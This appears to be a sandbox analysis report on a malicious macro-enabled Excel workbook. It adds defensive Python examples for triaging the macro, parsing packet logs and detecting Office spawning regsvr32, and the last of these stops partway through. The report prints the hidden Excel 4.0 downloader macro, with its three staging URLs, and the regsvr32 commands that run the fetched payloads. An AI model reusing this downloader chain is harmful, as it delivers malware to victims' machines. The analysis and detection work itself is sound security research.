                Preview: ...N.0...+....(q.V...X8......41.?y..o..dw..i.{i..3....x..+k.7.....E5a.8.vM.~=..Y.I8%.wP.5 ...}.>..`A..k..~p...+.....,|.".mlx.r)........%p.L...M..B..T...F.\;V.l~.Q5.!.-E"....H...-Ay.j.u.!.P..$k..5....D......A..*..a........r......i..|..d...`...G....._....r...:..iZ,a%.T]d..2.['..hMh.a....D.].N@../9...I.x@G.{................B...&z..w.....@......L..4.".".zJt`4_.....:T..Y..~.|..F.\)..i........tz?F...D...>N.\].j.1i...}GWO..2..3s ./.j..w.r........PK..........!...&n....o.......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Jun 26 00:42:34 2021, atime=Sat Jun 26 00:42:34 2021, length=12288, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.488589526252961
                Encrypted:false
                SSDEEP:12:85QO70LgXg/XAlCPCHaX7B8NB/rGX+WnicvbjbDtZ3YilMMEpxRljKfkcTdJP9TK:85pi/XTr6N0YebDv3qekwrNru/
                MD5:3008017780C977F34B7CC0E9613E89A6
                SHA1:E456406E7E0AE898CF5CAA11EEE3BE25ABEDFC73
                SHA-256:38B2995A29A84AA669E2E268B0B288EAD988E676B526E7453FF088159DCE19AD
                SHA-512:224E4F09CE7016C34AF43F2462F74797726D0ACFF19EA5D60C9381316FA315305EED01EA0A4B9D4B34D54D9412F67BAF82CF670A1062E9896132E97DE7B05724
                Malicious:false
                Reputation:low
                Preview: L..................F...........7G......,j......,j...0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......RR...Desktop.d......QK.X.RR.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\609290\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......609290..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Permission-40776837-06252021.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:11 2020, mtime=Sat Jun 26 00:42:34 2021, atime=Sat Jun 26 00:42:34 2021, length=153114, window=hide
                Category:dropped
                Size (bytes):2218
                Entropy (8bit):4.539188552481485
                Encrypted:false
                SSDEEP:48:8+T/XT+NnQV967l968ekwQh2+T/XT+NnQV967l968ekwQ/:8+T/X6NnYQze3Qh2+T/X6NnYQze3Q/
                MD5:7CE118B8EECE06D2E6600A46863DEAA0
                SHA1:A93B121CA1C54F39A87E51526453F7B3A7970D46
                SHA-256:539C4EEC9B08D46AC445AF735AAC4E8B5899AFF78C35671A269439895B424530
                SHA-512:AD70E748DC34768BF8F5E97E267182BC65A721D20CE550F39EEDE538E50F5E7BAEE57F6834873B8C7A170BE4247E0B33DEE0FD6DEFE0B3B4D63AE5E8D98AFA25
                Malicious:false
                Reputation:low
                Preview: L..................F.... ........{......,j..u...,j...V...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..X...RO. .PERMIS~1.XLS..p.......Q.y.Q.y*...8.....................P.e.r.m.i.s.s.i.o.n.-.4.0.7.7.6.8.3.7.-.0.6.2.5.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\609290\Users.user\Desktop\Permission-40776837-06252021.xlsm.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.e.r.m.i.s.s.i.o.n.-.4.0.7.7.6.8.3.7.-.0.6.2.5.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):139
                Entropy (8bit):4.73490127499812
                Encrypted:false
                SSDEEP:3:oyBVomxW+LxtTUSOX9UltLxtTUSOX9UlmxW+LxtTUSOX9Ulv:djHxO2/FxO2axO21
                MD5:DD807AE46DE66166FF8C2A5A2720329A
                SHA1:8F5E6BB049C86C267E546D071C0609561CAD3B8A
                SHA-256:97715C735644785465C596B1613D156B28E027F87CCA5FDCE747E9BFF9B6D0DC
                SHA-512:137575026C181CA5A11BE9DF209B9BC57D24D31C80C7C2B19088068AC7B67B5CAC88BF670AE6281F9C1212F5AFD6E8FA27D8ED5C3AE8C1DD5C6AB10F4BEC1FCD
                Malicious:false
                Reputation:low
                Preview: Desktop.LNK=0..[misc]..Permission-40776837-06252021.LNK=0..Permission-40776837-06252021.LNK=0..[misc]..Permission-40776837-06252021.LNK=0..
                C:\Users\user\Desktop\02CE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):153114
                Entropy (8bit):7.6645083416981485
                Encrypted:false
                SSDEEP:3072:cnxmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZO47t:cng4P4346PgZw9gQaB
                MD5:A426D91D65BBCD487AF2F9E280AF5CEE
                SHA1:69D0B820345DDFB4D58303F0EE5F82587B508033
                SHA-256:CDDC896ADF6465D4DD80B866469BE3197816C6E1FC1174394DB546DB35306890
                SHA-512:E39CC235BB3E9142B77872E793072EE4B8BF06C31B2ABC29AEA4B75AC2EB22B6F0296620DD73FCFFFE5D394516517BF04CDB7320042462BFF5D2C0FCCF6AD545
                Malicious:false
                Reputation:low
                Preview: ...N.0...+....(q.V...X8......41.?y..o..dw..i.{i..3....x..+k.7.....E5a.8.vM.~=..Y.I8%.wP.5 ...}.>..`A..k..~p...+.....,|.".mlx.r)........%p.L...M..B..T...F.\;V.l~.Q5.!.-E"....H...-Ay.j.u.!.P..$k..5....D......A..*..a........r......i..|..d...`...G....._....r...:..iZ,a%.T]d..2.['..hMh.a....D.].N@../9...I.x@G.{................B...&z..w.....@......L..4.".".zJt`4_.....:T..Y..~.|..F.\)..i........tz?F...D...>N.\].j.1i...}GWO..2..3s ./.j..w.r........PK..........!...&n....o.......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\Desktop\~$Permission-40776837-06252021.xlsm
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):330
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                MD5:96114D75E30EBD26B572C1FC83D1D02E
                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                Malicious:true
                Reputation:high, very likely benign file
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                Static File Info

                General

                File type:Microsoft Excel 2007+
                Entropy (8bit):7.666398010242972
                TrID:
                • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                • ZIP compressed archive (8000/1) 16.67%
                File name:Permission-40776837-06252021.xlsm
                File size:153750
                MD5:2cd2fd004b5589a595239f202ac648ae
                SHA1:ac02da8a953fd89f325c64bf5df93e415350ec12
                SHA256:ad3071800cd6852215e7ffcc6c65e7104e3d6e10bccfffc8249d73be0512d6dd
                SHA512:6cac4bb0573617012f4dbfe93fec4c18c824be4b452407a09af5b46d88326e24d828b5a4eea9b762c687a1fd6b98de8235ff9bad418313a00d9e6e36c38ffe8a
                SSDEEP:3072:QmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOYJ:P4P4346PgZw9gQaVJ
                File Content Preview:PK..........!.........o.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                File Icon

                Icon Hash:e4e2aa8aa4bcbcac

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:1

                OLE File "Permission-40776837-06252021.xlsm"

                Indicators

                Has Summary Info:
                Application Name:
                Encrypted Document:
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:

                Macro 4.0 Code

                Formulas recovered from the hidden Excel 4.0 macro sheet, in execution order (cell references into Sheet2 and Sheet4 are not resolved in the dump):
                =NOW()&H8
                .dat
                =REGISTER(Sheet2!O12,Sheet2!O13,Sheet2!O14,Sheet2!O15,,1,9)
                ="http://185.240.103.219/"
                =Jerutyg(0,F13&G8,"..\Kro.fis",0,0)
                ="http://190.14.37.3/"
                =Jerutyg(0,F14&G8,"..\Kro.fis1",0,0)
                ="http://185.183.99.120/"
                =Jerutyg(0,F15&G8,"..\Kro.fis2",0,0)
                =RUN(Sheet4!I9)
                =EXEC(Sheet2!O22)
                =EXEC(Sheet2!O22&"1")
                =EXEC(Sheet2!O22&"2")
                =HALT()
                Reading: the cell next to NOW()&H8 holds the literal ".dat", so the concatenation yields a filename derived from the current Excel date serial; the path requested from 185.183.99.120 under HTTP Packets, /44372.7795725694.dat, has exactly that shape. REGISTER imports a DLL export under the alias Jerutyg (the report's signatures identify it as URLDownloadToFile), and each Jerutyg call fetches the URL cell concatenated with the filename cell (F13&G8, F14&G8, F15&G8) into a relative path resolved against Excel's working directory (..\Kro.fis, ..\Kro.fis1, ..\Kro.fis2). The three EXEC calls run Sheet2!O22, O22&"1" and O22&"2", which matches the regsvr32 ..\Kro.fis, ..\Kro.fis1 and ..\Kro.fis2 command lines recorded under System Behavior; HALT() ends the macro.
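                The following is an added triage example, not part of the sandbox report or of the sample. It takes the XLM formulas listed above (transcribed as a constructed Python list, with cell references left unresolved because the workbook is not available) and extracts the download URLs, the REGISTER alias, the URL-to-drop-path pairs and the EXEC count; the pairing of a download call with the preceding URL literal is a positional heuristic that mirrors this workbook's layout. It also decodes a NOW()-derived request path such as /44372.7795725694.dat back into the time at which the macro ran. Function names and the BUILTINS set are the example's own choices.

```python
"""Triage helpers for an Excel 4.0 (XLM) macro dump and the request path it produces."""
import re
from datetime import datetime, timedelta

# Constructed input: the formulas transcribed from the report's "Macro 4.0 Code" section,
# in sheet order. Cell references (H8, G8, F13..F15, Sheet2!O12..O22, Sheet4!I9) stay
# unresolved because the workbook itself is not available here.
FORMULAS = [
    r'=NOW()&H8',
    r'=REGISTER(Sheet2!O12,Sheet2!O13,Sheet2!O14,Sheet2!O15,,1,9)',
    r'="http://185.240.103.219/"',
    r'=Jerutyg(0,F13&G8,"..\Kro.fis",0,0)',
    r'="http://190.14.37.3/"',
    r'=Jerutyg(0,F14&G8,"..\Kro.fis1",0,0)',
    r'="http://185.183.99.120/"',
    r'=Jerutyg(0,F15&G8,"..\Kro.fis2",0,0)',
    r'=RUN(Sheet4!I9)',
    r'=EXEC(Sheet2!O22)',
    r'=EXEC(Sheet2!O22&"1")',
    r'=EXEC(Sheet2!O22&"2")',
    r'=HALT()',
]

# XLM built-ins handled explicitly; any other function-style call is treated as an alias
# created by REGISTER (the report's signature ties this one to URLDownloadToFile).
BUILTINS = {"NOW", "REGISTER", "RUN", "EXEC", "HALT", "CALL", "GOTO", "FORMULA", "CHAR"}
HEAD_RE = re.compile(r'^=([A-Za-z_][A-Za-z0-9_.]*)\(')
URL_RE = re.compile(r'"(https?://[^"]+)"')
STR_RE = re.compile(r'"([^"]*)"')


def triage(formulas):
    """Collect URLs, REGISTER aliases, (URL, drop path) pairs and EXEC calls from XLM formulas.

    A download call is paired with the most recent URL literal. That mirrors how this
    workbook lays out its cells and is a positional heuristic, not a cell resolver.
    """
    out = {"urls": [], "aliases": [], "downloads": [], "exec_count": 0, "flags": []}
    last_url = None
    for f in formulas:
        for url in URL_RE.findall(f):
            out["urls"].append(url)
            last_url = url
        m = HEAD_RE.match(f)
        if not m:
            continue
        name = m.group(1)
        if name.upper() == "REGISTER":
            out["flags"].append("REGISTER: DLL export imported under an alias")
        elif name.upper() == "NOW" and "&" in f:
            out["flags"].append("NOW() concatenated into a string: time-derived filename")
        elif name.upper() == "EXEC":
            out["exec_count"] += 1
        elif name.upper() not in BUILTINS:
            if name not in out["aliases"]:
                out["aliases"].append(name)
            for path in STR_RE.findall(f):
                out["downloads"].append((last_url, path))
    if out["exec_count"]:
        out["flags"].append(f"EXEC called {out['exec_count']} time(s)")
    return out


# Excel's 1900 date system. The 1899-12-30 epoch absorbs the fictitious 1900-02-29,
# so the conversion is exact for every serial from 1900-03-01 onwards.
EXCEL_EPOCH = datetime(1899, 12, 30)
SERIAL_NAME_RE = re.compile(r'^/?(\d{5}\.\d+)\.dat$')


def excel_serial_to_datetime(serial):
    """Convert an Excel date serial such as NOW() produces back into a naive local datetime."""
    return EXCEL_EPOCH + timedelta(days=float(serial))


def decode_serial_path(path):
    """If an HTTP request path looks like NOW()&".dat", return the embedded timestamp, else None."""
    m = SERIAL_NAME_RE.match(path)
    return excel_serial_to_datetime(m.group(1)) if m else None


if __name__ == "__main__":
    report = triage(FORMULAS)
    for url, path in report["downloads"]:
        print(f'{url}<NOW()&".dat"> -> {path}')
    print(report["flags"])
    print(decode_serial_path("/44372.7795725694.dat"))
```

The decoded serial gives 2021-06-25 18:42:35 in the sandbox's local time, three seconds after the EXCEL.EXE start time recorded under System Behavior, which is the practical use of the decoder: a request path of this shape dates the macro execution without needing the workbook.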

                Network Behavior

                Snort IDS Alerts

                Timestamp                 Protocol  SID   Message                                        Src Port  Dst Port  Source IP        Dest IP
                06/25/21-18:43:10.505432  ICMP      399   ICMP Destination Unreachable Host Unreachable  -         -         186.148.101.114  192.168.2.22
                06/25/21-18:43:13.515728  ICMP      399   ICMP Destination Unreachable Host Unreachable  -         -         186.148.101.114  192.168.2.22
                06/25/21-18:43:19.735650  ICMP      399   ICMP Destination Unreachable Host Unreachable  -         -         186.148.101.114  192.168.2.22
                06/25/21-18:43:32.155929  ICMP      399   ICMP Destination Unreachable Host Unreachable  -         -         186.148.101.114  192.168.2.22
                06/25/21-18:43:35.295940  ICMP      399   ICMP Destination Unreachable Host Unreachable  -         -         186.148.101.114  192.168.2.22
                06/25/21-18:43:41.478686  ICMP      399   ICMP Destination Unreachable Host Unreachable  -         -         186.148.101.114  192.168.2.22
                06/25/21-18:43:52.235681  TCP       1201  ATTACK-RESPONSES 403 Forbidden                 80        49169     185.183.99.120   192.168.2.22

                Network Port Distribution

                TCP Packets

                Timestamp                             Src Port  Dst Port  Source IP        Dest IP
                Jun 25, 2021 18:43:07.261714935 CEST  49165     80        192.168.2.22     185.240.103.219
                Jun 25, 2021 18:43:07.347479105 CEST  80        49165     185.240.103.219  192.168.2.22
                Jun 25, 2021 18:43:07.843693972 CEST  49165     80        192.168.2.22     185.240.103.219
                Jun 25, 2021 18:43:07.935241938 CEST  80        49165     185.240.103.219  192.168.2.22
                Jun 25, 2021 18:43:08.436453104 CEST  49165     80        192.168.2.22     185.240.103.219
                Jun 25, 2021 18:43:08.528072119 CEST  80        49165     185.240.103.219  192.168.2.22
                Jun 25, 2021 18:43:08.531131029 CEST  49166     80        192.168.2.22     185.240.103.219
                Jun 25, 2021 18:43:08.622881889 CEST  80        49166     185.240.103.219  192.168.2.22
                Jun 25, 2021 18:43:09.122951031 CEST  49166     80        192.168.2.22     185.240.103.219
                Jun 25, 2021 18:43:09.213090897 CEST  80        49166     185.240.103.219  192.168.2.22
                Jun 25, 2021 18:43:09.716026068 CEST  49166     80        192.168.2.22     185.240.103.219
                Jun 25, 2021 18:43:09.806054115 CEST  80        49166     185.240.103.219  192.168.2.22
                Jun 25, 2021 18:43:09.828479052 CEST  49167     80        192.168.2.22     190.14.37.3
                Jun 25, 2021 18:43:12.820528030 CEST  49167     80        192.168.2.22     190.14.37.3
                Jun 25, 2021 18:43:18.827099085 CEST  49167     80        192.168.2.22     190.14.37.3
                Jun 25, 2021 18:43:30.827013969 CEST  49168     80        192.168.2.22     190.14.37.3
                Jun 25, 2021 18:43:33.835673094 CEST  49168     80        192.168.2.22     190.14.37.3
                Jun 25, 2021 18:43:39.842207909 CEST  49168     80        192.168.2.22     190.14.37.3
                Jun 25, 2021 18:43:51.888657093 CEST  49169     80        192.168.2.22     185.183.99.120
                Jun 25, 2021 18:43:51.954787970 CEST  80        49169     185.183.99.120   192.168.2.22
                Jun 25, 2021 18:43:51.954951048 CEST  49169     80        192.168.2.22     185.183.99.120
                Jun 25, 2021 18:43:51.955588102 CEST  49169     80        192.168.2.22     185.183.99.120
                Jun 25, 2021 18:43:52.021440983 CEST  80        49169     185.183.99.120   192.168.2.22
                Jun 25, 2021 18:43:52.235681057 CEST  80        49169     185.183.99.120   192.168.2.22
                Jun 25, 2021 18:43:52.235918999 CEST  49169     80        192.168.2.22     185.183.99.120
                Jun 25, 2021 18:44:57.235600948 CEST  80        49169     185.183.99.120   192.168.2.22
                Jun 25, 2021 18:44:57.237277985 CEST  49169     80        192.168.2.22     185.183.99.120
                Jun 25, 2021 18:45:04.865314007 CEST  49169     80        192.168.2.22     185.183.99.120
                Jun 25, 2021 18:45:04.931340933 CEST  80        49169     185.183.99.120   192.168.2.22
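                Added example, not part of the sandbox report: a parser for TCP Packets rows in the fused form the export delivers them (timestamp, then source port, destination port, source IP and destination IP run together with no separator), followed by a per-destination summary. Splitting the fused digits is only possible with two pieces of knowledge assumed here, the sandbox's own address (192.168.2.22) and the server port (80); both are parameters. The constructed input below is a subset of the rows above covering 190.14.37.3 and the start of the 185.183.99.120 session. For 190.14.37.3 the summary shows three unanswered packets per client port spaced 3 s and 6 s apart, which is the SYN retransmission schedule of a Windows 7 TCP stack, and the ICMP host-unreachable alerts in the Snort table arrive about 0.7 s after each of them.

```python
"""Parse fused sandbox "TCP Packets" rows and summarise each remote host."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed input: rows copied from the report's TCP Packets table in the fused
# form in which the export delivers them (ports and addresses run together).
ROWS = [
    "Jun 25, 2021 18:43:09.828479052 CEST4916780192.168.2.22190.14.37.3",
    "Jun 25, 2021 18:43:12.820528030 CEST4916780192.168.2.22190.14.37.3",
    "Jun 25, 2021 18:43:18.827099085 CEST4916780192.168.2.22190.14.37.3",
    "Jun 25, 2021 18:43:30.827013969 CEST4916880192.168.2.22190.14.37.3",
    "Jun 25, 2021 18:43:33.835673094 CEST4916880192.168.2.22190.14.37.3",
    "Jun 25, 2021 18:43:39.842207909 CEST4916880192.168.2.22190.14.37.3",
    "Jun 25, 2021 18:43:51.888657093 CEST4916980192.168.2.22185.183.99.120",
    "Jun 25, 2021 18:43:51.954787970 CEST8049169185.183.99.120192.168.2.22",
    "Jun 25, 2021 18:43:51.954951048 CEST4916980192.168.2.22185.183.99.120",
]
SANDBOX_IP = "192.168.2.22"   # assumption: the analysis machine's address from the report

ROW_RE = re.compile(
    r'^(?P<ts>[A-Za-z]{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+) [A-Z]+(?P<rest>\d[\d.]*)$')


def _valid_ip(s):
    parts = s.split(".")
    return len(parts) == 4 and all(
        p.isdigit() and int(p) <= 255 and (p == "0" or not p.startswith("0")) for p in parts)


def _valid_port(s):
    return s.isdigit() and not s.startswith("0") and 1 <= int(s) <= 65535


def parse_row(row, sandbox_ip=SANDBOX_IP, server_port="80"):
    """Split one fused row into timestamp, direction, client port and remote address."""
    m = ROW_RE.match(row)
    if not m:
        raise ValueError(f"unrecognised row: {row!r}")
    stamp, frac = m.group("ts").split(".")
    ts = datetime.strptime(f"{stamp}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")  # %f takes 6 digits
    rest = m.group("rest")
    # Outbound layout: <client_port><server_port><sandbox_ip><remote_ip>
    i = rest.find(sandbox_ip)
    if i > 0 and rest[:i].endswith(server_port) and _valid_ip(rest[i + len(sandbox_ip):]):
        client = rest[:i - len(server_port)]
        if _valid_port(client):
            return {"ts": ts, "dir": "out", "client_port": client,
                    "remote": rest[i + len(sandbox_ip):]}
    # Inbound layout: <server_port><client_port><remote_ip><sandbox_ip>. The remote
    # address's first octet is fused to the client port, so try octet widths 1..3 and
    # keep the split whose port and address are both valid.
    if rest.endswith(sandbox_ip):
        head = rest[:-len(sandbox_ip)]
        first_dot = head.find(".")
        for width in (1, 2, 3):
            cut = first_dot - width
            remote, ports = head[cut:], head[:cut]
            if (cut > 0 and _valid_ip(remote) and ports.startswith(server_port)
                    and _valid_port(ports[len(server_port):])):
                return {"ts": ts, "dir": "in", "client_port": ports[len(server_port):],
                        "remote": remote}
    raise ValueError(f"cannot split ports and addresses in {row!r}")


def summarize(rows):
    """Per remote host: packets each way, whether it ever replied, and the gaps (in whole
    seconds) between the sandbox's successive packets on each client port."""
    hosts = defaultdict(lambda: {"out": 0, "in": 0, "times": defaultdict(list)})
    for row in rows:
        p = parse_row(row)
        h = hosts[p["remote"]]
        h[p["dir"]] += 1
        if p["dir"] == "out":
            h["times"][p["client_port"]].append(p["ts"])
    summary = {}
    for host, h in hosts.items():
        gaps = {port: [round((b - a).total_seconds()) for a, b in zip(t, t[1:])]
                for port, t in h["times"].items()}
        summary[host] = {"out": h["out"], "in": h["in"], "answered": h["in"] > 0,
                         "retry_gaps": gaps}
    return summary


if __name__ == "__main__":
    for host, s in summarize(ROWS).items():
        print(host, s)
```

Run against the full table, the same summary shows 185.240.103.219 replying to every packet on 49165 and 49166 and 185.183.99.120 carrying the one completed HTTP exchange, so the three download servers behaved differently within a single minute even though the macro treats them identically.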

                HTTP Request Dependency Graph

                • 185.183.99.120

                HTTP Packets

                Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                0           192.168.2.22  49169        185.183.99.120  80                C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Timestamp                             kBytes transferred  Direction  Data
                Jun 25, 2021 18:43:51.955588102 CEST  2                   OUT        GET /44372.7795725694.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 185.183.99.120
                Connection: Keep-Alive
                Jun 25, 2021 18:43:52.235681057 CEST  2                   IN         HTTP/1.1 403 Forbidden
                Server: nginx
                Date: Fri, 25 Jun 2021 16:44:07 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii (decoded from Data Raw, CRLF line endings):
                <html>
                <head><title>403 Forbidden</title></head>
                <body>
                <center><h1>403 Forbidden</h1></center>
                <hr><center>nginx</center>
                </body>
                </html>
                <!-- a padding to disable MSIE and Chrome friendly error page -->
                (the padding comment line is repeated six times; 146 + 6 x 67 = 548 bytes, matching Content-Length)


                Code Manipulations

                Statistics

                Behavior


                System Behavior

                General

                Start time:18:42:32
                Start date:25/06/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13f3f0000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:43:20
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis
                Imagebase:0xff430000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:43:20
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis1
                Imagebase:0xff430000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:43:21
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis2
                Imagebase:0xff430000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
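                The three process entries above share one shape: EXCEL.EXE as parent, regsvr32.exe as child, and a module argument that is a relative path with a non-DLL extension (..\Kro.fis, ..\Kro.fis1, ..\Kro.fis2). The following is an added detection example, not part of the report, that scores process-creation events on exactly those conditions. The events are constructed here in a Sysmon Event ID 1-like shape (ParentImage, Image, CommandLine): the three launches from the report plus two benign controls, an installer registering a real DLL and Excel's print helper splwow64.exe. The parent and child name sets, the extension allow-list and the threshold are the example's own choices.

```python
"""Flag regsvr32 launched by an Office application with a non-DLL module path."""
import re
from pathlib import PureWindowsPath

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                "powershell.exe", "cmd.exe", "certutil.exe"}
COM_MODULE_EXT = {".dll", ".ocx", ".ax"}   # extensions regsvr32 normally loads

# Constructed events: the three regsvr32 launches recorded in the report plus two
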